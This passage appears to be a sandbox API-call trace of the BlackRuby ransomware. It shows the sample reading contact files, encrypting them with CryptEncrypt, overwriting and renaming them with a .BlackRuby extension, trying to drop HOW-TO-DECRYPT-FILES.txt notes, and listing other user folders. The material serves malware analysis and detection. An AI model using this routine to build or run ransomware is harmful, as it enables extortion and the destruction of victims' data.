returned 0x1 [0055.327] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x4e8 [0055.327] GetLastError () returned 0x0 [0055.327] ReadFile (in: hFile=0x184, lpBuffer=0x1c3c39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c3c39c*, lpNumberOfBytesRead=0x18ed84*=0x4e8, lpOverlapped=0x0) returned 1 [0055.329] GetLastError () returned 0x0 [0055.329] CloseHandle (hObject=0x184) returned 1 [0055.329] GetLastError () returned 0x0 [0055.329] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0055.329] GetLastError () returned 0x0 [0055.329] SetErrorMode (uMode=0x1) returned 0x0 [0055.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7abb8cc0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x7abb8cc0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x7abb8cc0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x4e8)) returned 1 [0055.329] GetLastError () returned 0x0 [0055.329] SetErrorMode (uMode=0x0) returned 0x1 [0055.339] CryptImportKey (in: hProv=0x37c708, pbData=0x1c97c44, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0055.339] GetLastError () returned 0x0 [0055.339] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.339] GetLastError () returned 0x0 [0055.344] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.344] GetLastError () returned 0x0 [0055.344] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0055.344] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.344] GetLastError () returned 0x0 [0055.344] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1cc4c90*=0x1, dwFlags=0x0) returned 1 [0055.344] GetLastError () returned 0x0 [0055.344] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1cc4c5c, dwFlags=0x0) returned 1 [0055.344] GetLastError () returned 0x0 [0055.344] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc4cd8*, pdwDataLen=0x18ed74*=0x5e0, dwBufLen=0x5e0 | out: pbData=0x1cc4cd8*, pdwDataLen=0x18ed74*=0x5e0) returned 1 [0055.344] GetLastError () returned 0x0 [0055.344] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc58c4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cc58c4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.344] GetLastError () returned 0x0 [0055.345] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cc58f4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cc58f4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.345] GetLastError () returned 0x0 [0055.345] CryptDestroyKey (hKey=0x360d20) returned 1 [0055.345] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.345] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact", lpFilePart=0x0) returned 0x2e [0055.345] GetLastError () returned 0x0 [0055.345] SetErrorMode (uMode=0x1) returned 0x0 [0055.345] GetFileType (hFile=0x184) returned 0x1 [0055.345] GetFileType (hFile=0x184) returned 0x1 [0055.346] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_eCW0xZCKsafDK9T3eYFkofPDnBJqmycrgLrWwGscSsX.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_ecw0xzcksafdk9t3eyfkofpdnbjqmycrglrwwgscssx.blackruby")) returned 1 [0055.347] GetLastError () returned 0xb7 [0055.348] SetErrorMode (uMode=0x0) returned 0x1 [0055.348] GetFileType (hFile=0x184) returned 0x1 [0055.348] GetFileType (hFile=0x184) returned 0x1 [0055.348] ReadFile (in: hFile=0x184, lpBuffer=0x1ce6e44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce6e44*, lpNumberOfBytesRead=0x18ed84*=0x4e9, lpOverlapped=0x0) returned 1 [0055.349] GetLastError () returned 0x0 [0055.360] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1d426fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ee0) returned 1 [0055.360] GetLastError () returned 0x0 [0055.360] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.360] GetLastError () returned 0x0 [0055.366] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0055.366] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1d6f748*=0x1, dwFlags=0x0) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1d6f714, dwFlags=0x0) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d6f790*, pdwDataLen=0x18ed74*=0x5e0, dwBufLen=0x5e0 | out: pbData=0x1d6f790*, pdwDataLen=0x18ed74*=0x5e0) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d7037c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1d7037c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d703ac*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1d703ac*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.366] GetLastError () returned 0x0 [0055.366] CryptDestroyKey (hKey=0x360ee0) returned 1 [0055.366] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.366] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", lpFilePart=0x0) returned 0x30 [0055.367] GetLastError () returned 0x0 [0055.367] SetErrorMode (uMode=0x1) returned 0x0 [0055.368] GetFileType (hFile=0x184) returned 0x1 [0055.368] GetFileType (hFile=0x184) returned 0x1 [0055.369] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_4gjv5HjBPdNX9dpLxx4kUCegR6czrVZt4aVw0qO9c.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_4gjv5hjbpdnx9dplxx4kucegr6czrvzt4avw0qo9c.blackruby")) returned 1 [0055.369] GetLastError () returned 0xb7 [0055.371] SetErrorMode (uMode=0x0) returned 0x1 [0055.371] GetFileType (hFile=0x184) returned 0x1 [0055.371] GetFileType (hFile=0x184) returned 0x1 [0055.372] ReadFile (in: hFile=0x184, lpBuffer=0x1d91a8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d91a8c*, lpNumberOfBytesRead=0x18ed84*=0x4f1, lpOverlapped=0x0) returned 1 [0055.373] GetLastError () returned 0x0 [0055.412] CryptImportKey (in: hProv=0x37c680, pbData=0x1b46570, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0055.412] GetLastError () returned 0x0 [0055.412] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.412] GetLastError () returned 0x0 [0055.422] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.422] GetLastError () returned 0x0 [0055.422] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ce0) returned 1 [0055.422] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.422] GetLastError () returned 0x0 [0055.422] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x4, pbData=0x1b735bc*=0x1, dwFlags=0x0) returned 1 [0055.423] GetLastError () returned 0x0 [0055.423] CryptSetKeyParam (hKey=0x360ce0, dwParam=0x1, pbData=0x1b73588, dwFlags=0x0) returned 1 [0055.423] GetLastError () returned 0x0 [0055.423] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b73604*, pdwDataLen=0x18ed74*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x1b73604*, pdwDataLen=0x18ed74*=0x5f0) returned 1 [0055.423] GetLastError () returned 0x0 [0055.423] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b74210*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b74210*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.423] GetLastError () returned 0x0 [0055.423] CryptEncrypt (in: hKey=0x360ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b74240*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b74240*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.423] GetLastError () returned 0x0 [0055.423] CryptDestroyKey (hKey=0x360fa0) returned 1 [0055.423] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.423] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0055.423] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpFilePart=0x0) returned 0x30 [0055.423] GetLastError () returned 0x0 [0055.423] SetErrorMode (uMode=0x1) returned 0x0 [0055.423] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.424] GetLastError () returned 0xb7 [0055.424] GetFileType (hFile=0x184) returned 0x1 [0055.424] SetErrorMode (uMode=0x0) returned 0x1 [0055.424] GetFileType (hFile=0x184) returned 0x1 [0055.425] CloseHandle (hObject=0x184) returned 1 [0055.425] GetLastError () returned 0xb7 [0055.425] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpFilePart=0x0) returned 0x30 [0055.425] GetLastError () returned 0xb7 [0055.425] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_0MLvABH2qTaqGKCMBn5r7RTiNkpXpxkLpPrdH0zvECk2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_0MLvABH2qTaqGKCMBn5r7RTiNkpXpxkLpPrdH0zvECk2.BlackRuby", lpFilePart=0x0) returned 0x5a [0055.425] GetLastError () returned 0xb7 [0055.425] SetErrorMode (uMode=0x1) returned 0x0 [0055.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25458f20, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0x25458f20, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x293a4560, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x600)) returned 1 [0055.425] GetLastError () returned 0xb7 [0055.425] SetErrorMode (uMode=0x0) returned 0x1 [0055.425] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_0MLvABH2qTaqGKCMBn5r7RTiNkpXpxkLpPrdH0zvECk2.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_0mlvabh2qtaqgkcmbn5r7rtinkpxpxklpprdh0zveck2.blackruby")) returned 1 [0055.426] GetLastError () returned 0xb7 [0055.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.426] GetLastError () returned 0xb7 [0055.426] SetErrorMode (uMode=0x1) returned 0x0 [0055.426] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.426] GetLastError () returned 0x5 [0055.427] SetErrorMode (uMode=0x0) returned 0x1 [0055.427] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.427] GetLastError () returned 0x5 [0055.427] SetErrorMode (uMode=0x1) returned 0x0 [0055.427] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), fInfoLevelId=0x0, lpFileInformation=0x1b93584 | out: lpFileInformation=0x1b93584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3beee70, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe3beee70, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe3beee70, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x4f3)) returned 1 [0055.428] GetLastError () returned 0x5 [0055.428] SetErrorMode (uMode=0x0) returned 0x1 [0055.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.428] GetLastError () returned 0x5 [0055.428] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.428] GetLastError () returned 0x5 [0055.428] SetErrorMode (uMode=0x1) returned 0x0 [0055.428] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.428] GetLastError () returned 0x0 [0055.428] GetFileType (hFile=0x184) returned 0x1 [0055.428] SetErrorMode (uMode=0x0) returned 0x1 [0055.428] GetFileType (hFile=0x184) returned 0x1 [0055.428] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x4f3 [0055.428] GetLastError () returned 0x0 [0055.428] ReadFile (in: hFile=0x184, lpBuffer=0x1b9581c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b9581c*, lpNumberOfBytesRead=0x18ed84*=0x4f3, lpOverlapped=0x0) returned 1 [0055.430] GetLastError () returned 0x0 [0055.430] CloseHandle (hObject=0x184) returned 1 [0055.430] GetLastError () returned 0x0 [0055.430] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.430] GetLastError () returned 0x0 [0055.430] SetErrorMode (uMode=0x1) returned 0x0 [0055.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3beee70, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe3beee70, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0xe3beee70, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x4f3)) returned 1 [0055.430] GetLastError () returned 0x0 [0055.430] SetErrorMode (uMode=0x0) returned 0x1 [0055.440] CryptImportKey (in: hProv=0x37c708, pbData=0x1bf10e0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b60) returned 1 [0055.440] GetLastError () returned 0x0 [0055.440] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.440] GetLastError () returned 0x0 [0055.446] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360de0) returned 1 [0055.446] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c1e12c*=0x1, dwFlags=0x0) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c1e0f8, dwFlags=0x0) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1e174*, pdwDataLen=0x18ed74*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x1c1e174*, pdwDataLen=0x18ed74*=0x5f0) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1ed80*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c1ed80*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c1edb0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c1edb0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.446] GetLastError () returned 0x0 [0055.446] CryptDestroyKey (hKey=0x360b60) returned 1 [0055.446] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.447] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0055.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.447] GetLastError () returned 0x0 [0055.447] SetErrorMode (uMode=0x1) returned 0x0 [0055.447] GetFileType (hFile=0x184) returned 0x1 [0055.448] SetErrorMode (uMode=0x0) returned 0x1 [0055.448] GetFileType (hFile=0x184) returned 0x1 [0055.448] WriteFile (in: hFile=0x184, lpBuffer=0x1c201e8*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x18ed58, lpOverlapped=0x0 | out: lpBuffer=0x1c201e8*, lpNumberOfBytesWritten=0x18ed58*=0x600, lpOverlapped=0x0) returned 1 [0055.449] GetLastError () returned 0xb7 [0055.449] CloseHandle (hObject=0x184) returned 1 [0055.449] GetLastError () returned 0xb7 [0055.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact", lpFilePart=0x0) returned 0x31 [0055.449] GetLastError () returned 0xb7 [0055.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_wDN9EErqA7H0iEY8J5G7dNtKc0wWfJ8F1ptYJC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_wDN9EErqA7H0iEY8J5G7dNtKc0wWfJ8F1ptYJC.BlackRuby", lpFilePart=0x0) returned 0x54 [0055.449] GetLastError () returned 0xb7 [0055.449] SetErrorMode (uMode=0x1) returned 0x0 [0055.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3beee70, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xe3beee70, ftLastAccessTime.dwHighDateTime=0x1d2fb2e, ftLastWriteTime.dwLowDateTime=0x293f0820, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x600)) returned 1 [0055.449] GetLastError () returned 0xb7 [0055.449] SetErrorMode (uMode=0x0) returned 0x1 [0055.449] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Encrypted_wDN9EErqA7H0iEY8J5G7dNtKc0wWfJ8F1ptYJC.BlackRuby" (normalized: "c:\\users\\eebsym5\\contacts\\encrypted_wdn9eerqa7h0iey8j5g7dntkc0wwfj8f1ptyjc.blackruby")) returned 1 [0055.449] GetLastError () returned 0xb7 [0055.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0055.450] GetLastError () returned 0xb7 [0055.450] SetErrorMode (uMode=0x1) returned 0x0 [0055.450] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\contacts\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0055.450] GetLastError () returned 0x5 [0055.451] SetErrorMode (uMode=0x0) returned 0x1 [0055.452] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Cookies", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Cookies", lpFilePart=0x0) returned 0x18 [0055.452] GetLastError () returned 0x5 [0055.452] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.452] GetLastError () returned 0x5 [0055.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.452] GetLastError () returned 0x5 [0055.452] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Cookies", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Cookies", lpFilePart=0x0) returned 0x18 [0055.452] GetLastError () returned 0x5 [0055.452] SetErrorMode (uMode=0x1) returned 0x0 [0055.452] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Cookies\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0055.452] GetLastError () returned 0x5 [0055.454] SetErrorMode (uMode=0x0) returned 0x1 [0055.454] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x0) returned 0x18 [0055.454] GetLastError () returned 0x5 [0055.454] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.454] GetLastError () returned 0x5 [0055.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.454] GetLastError () returned 0x5 [0055.454] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x0) returned 0x18 